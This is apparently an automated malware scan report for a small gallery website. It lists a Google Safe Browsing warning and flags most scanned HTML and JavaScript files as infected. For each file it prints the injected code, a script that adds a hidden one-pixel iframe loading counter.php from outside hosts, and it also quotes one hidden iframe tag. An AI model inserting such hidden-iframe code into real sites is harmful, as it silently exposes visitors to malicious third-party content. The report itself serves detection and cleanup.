Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=galeria.winiar.i15.eu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://galeria.winiar.i15.eu/ | 200 OK Content-Length: 16428 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
Malicious iFrame found. size: 10x10 style: hidden src: http://www.proximity.ma/counter.php This URL is marked by Google as suspicious <iframe src="http://www.proximity.ma/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://galeria.winiar.i15.eu/kosljun/index.html | 200 OK Content-Length: 2851 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/kosljun/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/kosljun/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://galeria.winiar.i15.eu/pag1/index.html | 200 OK Content-Length: 2847 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/pag1/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/pag1/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/tovarnele/index.html | 200 OK Content-Length: 2842 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/tovarnele/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/tovarnele/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/bosana/index.html | 200 OK Content-Length: 2852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/bosana/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/bosana/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/pag/index.html | 200 OK Content-Length: 2837 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 21 Dec 2014 00:43:27 GMT
Accept-Ranges: bytes
ETag: "214ab6c-402c-4e49e5ae89400"
Server: Apache
Content-Length: 16428
Content-Type: text/html
Expires: Sun, 21 Dec 2014 00:43:28 GMT
Last-Modified: Fri, 23 Aug 2013 14:38:08 GMT
...16428 bytes of data.
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 21 Dec 2014 00:43:27 GMT
Accept-Ranges: bytes
ETag: "214ab6c-402c-4e49e5ae89400"
Server: Apache
Content-Length: 16428
Content-Type: text/html
Expires: Sun, 21 Dec 2014 00:43:28 GMT
Last-Modified: Fri, 23 Aug 2013 14:38:08 GMT
...16428 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Referer: http://www.google.com/search?q=galeria.winiar.i15.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Referer: http://www.google.com/search?q=galeria.winiar.i15.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.